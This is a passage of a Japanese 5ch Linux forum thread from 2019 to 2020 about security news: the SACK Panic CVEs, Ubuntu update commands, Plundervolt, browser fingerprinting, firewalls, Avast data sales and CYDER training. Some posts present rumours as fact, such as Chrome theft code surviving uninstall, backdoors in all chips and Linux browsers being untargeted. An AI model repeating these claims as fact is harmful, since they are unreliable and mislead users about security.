PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。

06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。

逐次情報は更新していく予定です。

111 :login:Penguin:2019/06/22(土) 09:34:44.67 ID:BWxAJ8Sj.net
>>110に関連して、アップデートが大量に来ている。

また、
◆snapアプリのアップデートはaptコマンドでは不可能である。

初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)

(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。

$ sudo apt update

(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。

$ sudo apt -y upgrade

ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。

(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。

$ sudo apt autoremove

$ sudo apt autoclean

(4)次にsnapアプリの更新を行う。

$ sudo snap refresh

snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。

GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。

112 :login:Penguin:2019/07/03(水) 23:55:13.69 ID:OptOlEBI.net
>>1
Linuxなんて使わない。


以上。

113 :login:Penguin:2019/09/29(日) 21:20:57.29 ID:Nip3Jzi1.net
 彡⌒ミ
 (,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ

114 :login:Penguin:2019/10/13(Sun) 01:09:29 ID:ueikBXbu.net
Google、Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan
https://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/

115 :login:Penguin:2019/10/25(金) 00:20:33.72 ID:j4GkuklA.net
>>6
それ違う
負けないためには、だね

コモドでいいよな?

116 :login:Penguin:2019/12/12(木) 00:50:01.16 ID:jaG34Ck9.net
IntelのCPUに脆弱性 [402859164]
https://leia.5ch.net/test/read.cgi/poverty/1576065630/

供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/
Plundervolt
https://plundervolt.com/


17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?

19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>19
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた

26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>19
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ

117 :login:Penguin:2019/12/12(木) 02:35:29.36 ID:QpDguOY0.net
Linuxだから安全です。

118 :login:Penguin:2019/12/12(木) 19:43:32.89 ID:jaG34Ck9.net
>>116続き

44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>21>28
なにこれ?
PC起動してないとCPUコントロール出来ないよね?

もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?

>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。

54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>46
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる

63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>53
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで

55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>56
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?

119 :login:Penguin:2019/12/13(金) 19:09:08.80 ID:ESmGY9a7.net
>>117
コアダンプしそう

120 :login:Penguin:2019/12/13(金) 19:14:21.26 ID:ESmGY9a7.net
Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか

121 :login:Penguin:2019/12/16(月) 00:27:12.94 ID:Oy6287lw.net
MicrosoftがUbuntu用のDefender出すんだって?

122 :login:Penguin:2019/12/16(月) 05:28:15.87 ID:AxOoqKNy.net
LinuxサーバーはAzureしか選択肢が無くなったかもかも。

123 :login:Penguin:2019/12/16(月) 06:38:47.87 ID:AxOoqKNy.net
iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。

124 :login:Penguin:2019/12/16(月) 20:16:03.60 ID:F52Y2AF9.net
>>121
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...

125 :login:Penguin:2019/12/17(火) 02:23:31.85 ID:eJqKdH1L.net
>>124
MSってそんな個人情報抜いてるの?
Skypeで抜いてるのにはびびったが。
あれはそこそこ信用してただけにびっくりした。
Skypeごときの情報抜かないだろうって思ってた。

MSってGoogle並みに個人情報抜いてるの?
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ

126 :login:Penguin:2019/12/17(火) 03:54:51.93 ID:+GuS9PLu.net
くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね

127 :login:Penguin:2019/12/17(火) 07:05:33.11 ID:BN1fWjc1.net
ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple

128 :login:Penguin:2019/12/17(火) 10:14:03.65 ID:d36jgmOT.net
最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象

129 :login:Penguin:2019/12/17(火) 10:37:04.71 ID:h64x6iyX.net
たしかに。

130 :login:Penguin:2019/12/17(火) 21:04:10.21 ID:IhVBQ6dn.net
OS以外のファイルはゴッソリ抜かれてるのに
Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ

131 :login:Penguin:2019/12/17(火) 21:15:21.09 ID:486GIvh4.net
チョロメや考えなしに派生したクロを入れるのも
泥棒の手を引いて家ん中案内するようなもんだしね

132 :login:Penguin:2019/12/18(水) 13:16:10.19 ID:b8AkMopr.net
どれ使うのがええのん?
opensuseとfirefox?

133 :login:Penguin:2019/12/18(水) 20:51:19.26 ID:ng+ewP2B.net
俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが
ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ

134 :login:Penguin:2019/12/18(水) 23:21:12.25 ID:Ghj3q23V.net
【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン
https://hayabusa9.5ch.net/test/read.cgi/news/1522897669/

135 :login:Penguin:2019/12/19(木) 13:08:27.51 ID:eQXTO88z.net
>>132
firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
GNUのicecat(firefox系)も良い感じ

>>133
firejail --private=<専用の一時ホームディレクトリ> とか?
canvasは個別に対応が必要だと思う

136 :login:Penguin:2019/12/19(木) 15:29:49.65 ID:hhS7ytBr.net
>>135
user.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの?
about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ

>canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの?

137 :login:Penguin:2019/12/20(金) 02:13:31.46 ID:3v00n4yQ.net
operaやvivaldiはどんな評価やろ

138 :login:Penguin:2019/12/20(金) 08:11:46.30 ID:W5p7NQnV.net
GoogleがChromeやFirefox以外のブラウザを弾くようになって無理

139 :login:Penguin:2019/12/20(金) 20:28:03.18 ID:BMpjrsOC.net
つ参考

Browser Fingerprinting対策ツールの評価(pdf)
https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&item_id=187815&file_id=1&file_no=1

Web Browser Fingerprint解説ページ
https://www.saitolab.org/fp_site/

140 :login:Penguin:2019/12/21(土) 16:40:49.62 ID:P2W6B/wx.net
まじで教えてチョメ クロ 危ないんですか?
火狐は大丈夫なら 前2者は早速削除したいと思います。

141 :login:Penguin:2019/12/21(土) 16:56:46.98 ID:P2W6B/wx.net
Sicklylifeさんはファイアーウオールは有効にしなくてもよい
とありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか

142 :login:Penguin:2019/12/21(土) 20:37:04.76 ID:8u1F/kP3.net
>>140
Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。

>>141
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば?

143 :login:Penguin:2019/12/21(土) 21:33:25.68 ID:2yt7G6Gl.net
>>140
チョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね?
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが?
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね?

144 :login:Penguin:2019/12/22(日) 05:32:17.57 ID:F7RmFDTN.net
>>141
セキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る)

例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか?
FWはそういう可能性をカット出来る(公開する意図のない宛先には)

不要なアタックサーフェイスは狭めるのがセキュリティの基本

145 :login:Penguin:2019/12/22(日) 10:24:37.91 ID:QiAxui6d.net
小手先だけで、基礎の教養なしにubuntu を使っている小生には
ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。

146 :login:Penguin:2019/12/23(月) 03:58:31.72 ID:fOOPeHWr.net
>>136-137
Canvasってなんだっけ?
CanvasってJavaScriptオフだと機能しないよね?
俺の勘違い?

147 :login:Penguin:2019/12/23(月) 04:06:22.21 ID:fOOPeHWr.net
Ubuntu18.04使用でブラウザはFirefox、Torbrowserしか入れてないわ
Chromeは論外で他に選択しないからこの2つ以外入れてない

Torスレでもなんか話題になってたけど、
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの?

TorBrowserもFirefox基盤だけど、
>>135
>デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
にはなってないよね?
なにせTorBrowserだし・・・

148 :login:Penguin:2019/12/23(月) 04:54:54.78 ID:fOOPeHWr.net
>>133
>ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
>仮想マシンにZorin LiteとFirefoxだけ入れてzipして
>やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる

なんでこんなめんどくさいことしてるの?
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの?
UbuntuのJournalに履歴とか残るから?

149 :login:Penguin:2019/12/23(月) 10:49:30.08 ID:1IWvct7N.net
iptablesはもう古いよ
これからはnftablesだよ

150 :login:Penguin:2019/12/23(月) 12:05:01.09 ID:x1WXtyaO.net
履歴w

151 :login:Penguin:2019/12/23(月) 17:23:14.88 ID:Y4WL5T53.net
Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか?

152 :login:Penguin:2019/12/24(火) 11:41:20.66 ID:NeirOfqJ.net
>>146
ここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得)
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな

JSを切ればcanvasでは取れないような…?他もかなり良くなる

>>147
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ
公式でTor無しバージョンもリリースすれば良いのに
もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る)

153 :login:Penguin:2020/01/28(火) 22:15:11 ID:zrSY3ZQs.net
無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か? [594632409]
https://leia.5ch.net/test/read.cgi/poverty/1580177900/


無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か
Carrie Mihalcik (CNET News) 翻訳校正: 編集部2020年01月28日 11時07分
ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。
https://japan.cnet.com/article/35148566/

154 :login:Penguin:2020/01/28(火) 22:26:23 ID:msT/XQYC.net
Linuxに関係あるんか?

155 :login:Penguin:2020/01/28(火) 22:30:53 ID:meBmn7jU.net
やはり、営利企業がリリースするウィルス対策ソフトには、
用心したほうがいいんでしょう。そもそもなにゆえ無料なのか…

avast は Linux用もあるからね。

156 :login:Penguin:2020/01/28(火) 22:39:50 ID:msT/XQYC.net
Linux版も無料なのか?

157 :login:Penguin:2020/01/28(火) 22:49:55 ID:meBmn7jU.net
>>156
今は知らんけど、過去にはあった。

158 :login:Penguin:2020/01/28(火) 22:52:43 ID:meBmn7jU.net
CNET News 翻訳記事の中には、
「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。
と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。
やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。

159 :login:Penguin:2020/01/28(火) 22:58:30 ID:msT/XQYC.net
>>157
今はないとしたらほぼ影響はないか

160 :login:Penguin:2020/01/28(火) 23:02:40 ID:meBmn7jU.net
>>159
今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。

161 :login:Penguin:2020/01/28(火) 23:07:56 ID:msT/XQYC.net
>>160
検索するくらいは出来るでしょ
なさそうだけど

162 :login:Penguin:2020/01/28(火) 23:09:01 ID:YOaQ6DqC.net
数年前に中華資本になったんだっけ?

163 :login:Penguin:2020/01/28(火) 23:10:35 ID:meBmn7jU.net
avast とは関わりたくないから。

164 :login:Penguin:2020/01/28(火) 23:14:54 ID:msT/XQYC.net
別に責めてるわけじゃないからね
ただ話膨らませるなら検索くらいしなよ

165 :login:Penguin:2020/01/29(水) 00:38:40 ID:FX+veRBJ.net
avastって中華になってたのかよw
ロシアと中華マジスゲエなあ

Linux関係ないけど、androidの中華作成のVirtual exposedってのも
ウイルスてんこ盛りらしいから気をつけてな

166 :login:Penguin:2020/01/29(水) 08:40:01 ID:QKw1rI8u.net
まじかよ
つい先日レノボの Rayzen ノート買っちまったよ

167 :login:Penguin:2020/01/29(水) 09:38:52.68 ID:d7wE0hb8.net
>>166
レノボは中共製で知られているが、個人データを密かに送信してるんじゃないかと
かなり前に騒がれたが、今ではその話題は見かけないようになった。

168 :login:Penguin:2020/01/29(水) 09:48:03.97 ID:d7wE0hb8.net
>>164
じゃ、話しを膨らませてあげるよ。
皆さん、結構関心あったと思うけど。何人も、avast 使ってウイルス対策していたよ。
このソフトは、無料なのに使いやすかったからなあ。

169 :login:Penguin:2020/01/29(水) 09:51:50.83 ID:d7wE0hb8.net
アンチウイルス avast! Linux Home Edition
https://mao.5ch.net/test/read.cgi/linux/1186329249/

この過去スレ、おもしろいよ。好奇心があるなら是非。

170 :login:Penguin:2020/02/14(金) 02:20:37.02 ID:c0Qe/FjT.net
avastはチェコだろ
avastが情報売買してるんなら買収したAVGもしてるんだろうな

171 :login:Penguin:2020/02/14(金) 16:38:25.68 ID:gX1pOkts.net
>>168
日本語が不自由なようだな
検索をしろって話
話を膨らませろってことじゃない

172 :login:Penguin:2020/03/05(木) 01:34:35 ID:G4vFpVY+.net
【セキュリティ】スマホ、PCのバージョン更新をサボっている人は要注意! 世界10億台以上のデバイスに深刻な脆弱性が見つかる
https://asahi.5ch.net/test/read.cgi/newsplus/1583331541/

●Kr00kの影響を受けるデバイスは10億台以上!
「Kr00k(CVE-2019-15126)」と名付けられたこの脆弱性は、
多くのクライアントデバイスが採用するBroadcomおよびCypressのWi-Fiチップに存在。
脆弱性を解消するためのパッチの適用が必要となるデバイスの総数は、実に10億を超えているとみられる。
https://headlines.yahoo.co.jp/article?a=20200304-00010000-finders-bus_all

173 :login:Penguin:2020/03/05(木) 09:18:22 ID:A5krwWfW.net
BroadcomもCypressも使ってないから無問題

174 :login:Penguin:2020/03/06(金) 07:58:55 ID:sgw3Rl5z.net
>>172
ドザざまあwww
Linux使ってた俺ら大勝利!

175 :login:Penguin:2020/03/07(土) 01:08:45 ID:m3qf4p2x.net
もう全チップにバックドア埋め込まれてるとみといていいよ

重大なAndroidセキュリティリスクが確認され、数百万台のデバイスを「ルート化」できる-可能な場合は今すぐ更新
https://www.forbes.com/sites/daveywinder/2020/03/04/critical-android-security-risk-confirmed-millions-of-devices-can-be-rooted---update-now-if-you-can/amp/

エドワード・スノーデン (Edward Snowden) 総合スレ
https://mao.5ch.net/test/read.cgi/war/1376109425/

176 :login:Penguin:2020/03/11(水) 06:58:14.09 ID:NC36v9Y3.net
そのあたり懸念してReplicantOSってアンドロイドRomは機種限定してるんだよね。
WifiもAsix製チップ指定でUSBアダプタ経由で使う徹底ぶり。

177 :login:Penguin:2020/03/12(木) 14:42:59 ID:yHbe8GdM.net
これどうだろ?

【PC】マイクロソフト、Linux用のマルウェア対策ソフト「Microsoft Defender ATP for Linux」
https://egg.5ch.net/test/read.cgi/bizplus/1582619543/

178 :login:Penguin:2020/03/12(木) 15:30:58 ID:AmodBQx2.net
ええな

179 :login:Penguin:2020/03/14(土) 23:23:23 ID:ndyfJBcC.net
なんか仕込まれそうで怖ぇ

180 :login:Penguin:2020/03/15(日) 19:44:45 ID:j8vnzYAm.net
いまや個人情報売買で経営が成り立ってるマイクソがタダでモノ使わせてくれるわけないだろ?

181 :login:Penguin:2020/03/16(月) 02:00:31.10 ID:6TJuwv7v.net
オープンソースじゃねえのか

182 :login:Penguin:2020/03/16(月) 20:44:24 ID:rhUEVfJP.net
どーせはデータ受信部分にでも泥棒機能がついてて
データ更新するたびにファイル構成やら設定したファイルやら
金の匂いのしそうなモンをアレコレ持ち出されるんだろ?w
これぞMSクオリティじゃないか

183 :login:Penguin:2020/03/20(金) 16:39:40 ID:oDz6Qr3S.net
>>25
>きちんと設定されてなかったり(互換性のせいで出来ない)、

SElinux有効にするとunboundが動かなくなるので無効にしてる
よりによってプライバシー対策で切れないソフト

184 :login:Penguin:2020/03/26(木) 07:43:16.57 ID:941RjX5YI
Linuxイメージをトレント経由でダウンロードって危険?
トレントのほうが爆速なんだが...。

185 :login:Penguin:2020/03/26(木) 07:47:26.12 ID:941RjX5YI
いま思ったけど、なんで2chはhttpsじゃないんだ?

186 :login:Penguin:2020/03/26(木) 23:02:10.20 ID:jrrqybHOJ
>>185
自分も気になったけど、パフォーマンスに影響あるからとかじゃない?

187 :login:Penguin:2020/04/04(土) 21:56:37.27 ID:0zR8/rfhV
プログラミングにはやってはいけない勉強法がある!?爆速で成長する王道のプログラミング学習法を紹介!
https://www.youtube.com/watch?v=ZJqVQJwvwNI
慶應主席レベルの秀才がプログラミングの独学に失敗した理由
https://www.youtube.com/watch?v=F2m1bsqaAHg
知らずに転職したら失敗する!ブラックIT企業を見分ける11のポイントを徹底解説
https://www.youtube.com/watch?v=a8qDFMsYAqM
営業マンが独学のみでプログラマーに転職して1年で月収80万超えた話
https://www.youtube.com/watch?v=94YQSckQGCs
未経験から2年でフリーランスエンジニアに!安定的に稼げるようになるための5ステップ
https://www.youtube.com/watch?v=oGNpEmFOEcU
フリーランスエンジニアになるなら大規模ベンチャー or 小規模ベンチャー どっち?
https://www.youtube.com/watch?v=-39tg9icRlU
【初心者必見】Webライター・Webマーケターを目指すならまずこの5冊!プロ御用達の文章術本を徹底紹介
https://www.youtube.com/watch?v=y_QBBLdG9QM
【本質】稼げるフリーランスライターになるための前提とは【記事数=ライターの価値じゃない】
https://www.youtube.com/watch?v=xFDMgcpknDA
生産性10倍!知らないと損する3つの最強デザインツール
https://www.youtube.com/watch?v=z6x1R1455Kc

188 :login:Penguin:2020/04/12(日) 20:17:25 ID:FkqTAYd2.net
【IT】AppleとGoogleが「新型コロナウイルス追跡システム」をiOSとAndroidに組み込む。
ttps://asahi.5ch.net/test/read.cgi/newsplus/1586681010/

AppleおよびGoogleが提唱する追跡システムは、BLEを用いて連絡先追跡ネットワークを構築し、互いに近接していたスマートフォンに関する大量のデータを保持します。
iOS・Android端末間の相互運用を可能にするAPIをリリースすると発表。
さらに、2020年5月以降にはAppleとGoogleがモバイルOSにも追跡ソリューションを組み込むことで、Bluetoothベースの追跡システムをより幅広い範囲で活用できるようにするとしています

https://gigazine.net/news/20200411-google-apple-coronavirus-tracing-system/

189 :login:Penguin:2020/04/12(日) 21:29:22 ID:PVWMHMkl.net
>>188
具体的に何を可能とするかという説明が一切ないね

190 :login:Penguin:2020/04/12(日) 21:43:53 ID:PVWMHMkl.net
これはプライバーの問題と係わってくるから
今でも、位置情報が記録されてる

191 :login:Penguin:2020/04/12(日) 22:39:18.40 ID:mweIS90Z.net
Googleが開発したのに「AppleとGoogleが」
ロゴすらApple左Google右という徹底ぶり。

192 :login:Penguin:2020/04/12(日) 23:20:15 ID:wPD0Lny+.net
アルファベット順だろ

193 :login:Penguin:2020/04/13(月) 00:34:03.12 ID:i2WW3vba.net
都合の良い時だけそう言うAppleメソッド。

作ったのはGoogleなのに、発表はアルファベット順にしろと言う。
だったらAlphabet/Goole Appleの順でなくちゃおかしいだろう

194 :login:Penguin:2020/04/13(月) 04:30:40.00 ID:hG1t6L/h.net
小学生の屁理屈

195 :login:Penguin:2020/04/22(水) 17:14:26.52 ID:kCvg5qbo.net
【スマホ】KDDI スマホ位置情報 都道府県などに無償提供 新型コロナ
https://asahi.5ch.net/test/read.cgi/newsplus/1587540713/

新型コロナウイルスの感染拡大防止に役立ててもらおうと、
auのKDDIは、スマートフォンの位置情報などのデータをプライバシーを保護したうえで
全国の都道府県などに無償で提供することを決めました。
ヤフーもこうしたデータの提供を始めていて、
大手企業が持つデータの活用がどこまで進むか注目されます。
https://www3.nhk.or.jp/news/html/20200422/k10012400501000.html

196 :login:Penguin:2020/05/01(金) 20:04:06 ID:Or87f1Mo.net
【中国】Xiaomiのスマートフォン アリババに端末の行動記録を無断で送信か シークレットモードでもアウト Xiaomi「嘘だ!」 [ガーディス★]
https://asahi.5ch.net/test/read.cgi/newsplus/1588330336/

Xiaomiのスマートフォン「Xiaomi Redmi Note 8」が、端末上で行われたユーザーのほとんどの行動を記録し、アリババのサーバーに送っていることを、セキュリティ研究者のGabriel Cirlig氏が発見しました。
https://uk.pcmag.com/smartphones/126774/report-xiaomi-phones-scooping-up-tons-of-web-browsing-data-even-in-incognito-mode
https://news.livedoor.com/lite/article_detail/18202655/
..

197 :login:Penguin:2020/05/08(金) 23:30:53 ID:PgEvz8/n.net
カスペルスキーがAndroid標的のスパイウェア「PhantomLance」の調査結果を公開、東南アジアを中心に活動


攻撃活動はベトナムに拠点を置くとみられるAPT(Advanced Persistent Threat)攻撃グループ「OceanLotus」によるものとみられ、
2019年7月にロシアのセキュリティベンダーであるDoctor Webが発見した。
なお、APT攻撃グループとは、国家組織からの指示と支援を受け、高度で持続的な脅威を実行するグループを指す。

不正アプリの主な目的はインストールしたデバイスのさまざまな情報を収集することで、
位置情報や通話ログ、連絡先、SMSのほか、インストールしているアプリのリストやAndroidデバイスのモデル、
OSのバージョンといったデバイス情報を収集しているという。
https://k-tai.watch.impress.co.jp/docs/news/1251/305/amp.index.html


最初に引っ掛らなかったのはこういうカラクリが『アプリのアップデートを配信することによって、
悪意ある機能が追加された』:PhantomLanceのAndroid向けバックドア、Google Playで見つかる
https://itnews.org/news_resources/164747

198 :login:Penguin:2020/05/14(木) 17:36:10 ID:GXzXpqxg.net
【乞食速報】サイバー防御の教材、無料配布へ [158879285]
https://leia.5ch.net/test/read.cgi/poverty/1589443202/


実践的サイバー防御演習「CYDER」の教材を期間限定で一般公開
2020年5月12日

国立研究開発法人情報通信研究機構


国立研究開発法人情報通信研究機構(NICT、理事長: 徳田 英幸)ナショナルサイバートレーニングセンターは、当センターが推進する実践的サイバー防御演習「CYDER*」の周知啓発の取組の一環として、
本日、期間限定で過去の演習教材の一部の一般公開を開始しました。
ダウンロード方法やCYDERの詳細、最新情報等は、公式Webサイトにてご確認ください。

* CYDER(サイダー): CYber Defense Exercise with Recurrence(サイバー防御反復演習)

CYDERでは、セキュリティインシデントが発生した際の対応手順や事前の備え等について学ぶことができます。
1 背景・趣旨
新型コロナウイルス感染症緊急事態宣言の発出を受け、日本国内の多くの組織において、在宅勤務等、通常と異なる形態での勤務を余儀なくされていますが、このような状況においても、サイバー攻撃の
脅威は続いています。サイバー攻撃への対策としては、ITシステムを利用する方々の基礎知識の習得やトレーニングが重要ですが、現在の社会情勢においては、十分な学習機会の確保が困難な状況と
なっています。
このような情勢下における緊急的な措置及びCYDERの周知啓発の取組の一環として、このたび、NICTは、サイバーセキュリティに関する技術や知識を必要とする方の学習の一助とすべく、CYDERの過去の
演習教材の一部を期間限定で一般公開することとしました。

199 :login:Penguin:2020/05/14(木) 17:36:51 ID:GXzXpqxg.net
2 CYDER教材の一般公開の概要
1) 提供内容: 過去の演習シナリオを課題単位で再構成した教材を提供
2) 提供方法: 以下のWebサイトで申請を受け付け、指定場所からダウンロードする形で提供
https://cyder.nict.go.jp/
3) 提供期間: 2020年5月12日(火)から当面の間(当機構の判断による)
4) 対象: 組織内において情報システムの管理に携わる方、その人材育成に関わる方、その他サイバー防御演習に関心のある方など
5) 費用: 無料

3 注意事項
1) 緊急事態宣言を受けた暫定的な対応として、期間限定での提供となります。そのため、状況の変化等に伴い、予告なく変更・終了する場合があります。
2) 学習者が興味のある課題を選択して学習できるよう、演習シナリオを課題単位に分割して提供します。
3) 今回は教材のみの配布のため、CYDERの大規模演習環境は利用できません。
4) 本教材の著作権は、国立研究開発法人情報通信研究機構に帰属します。商業上の利得や金銭報酬を目的とした営利目的の利用、及び、本教材の複製や改変、第三者への再配布を禁止します。

4 利用例
1) 外出が難しい状況下の在宅勤務等における学習教材
2) 組織内での研修用教材
3) 研修・教育を今後担当する方自身のトレーニング用教材

https://www.nict.go.jp/press/2020/05/12-1.html

200 :login:Penguin:2020/06/09(火) 12:35:46.17 ID:bAdCtyAo.net
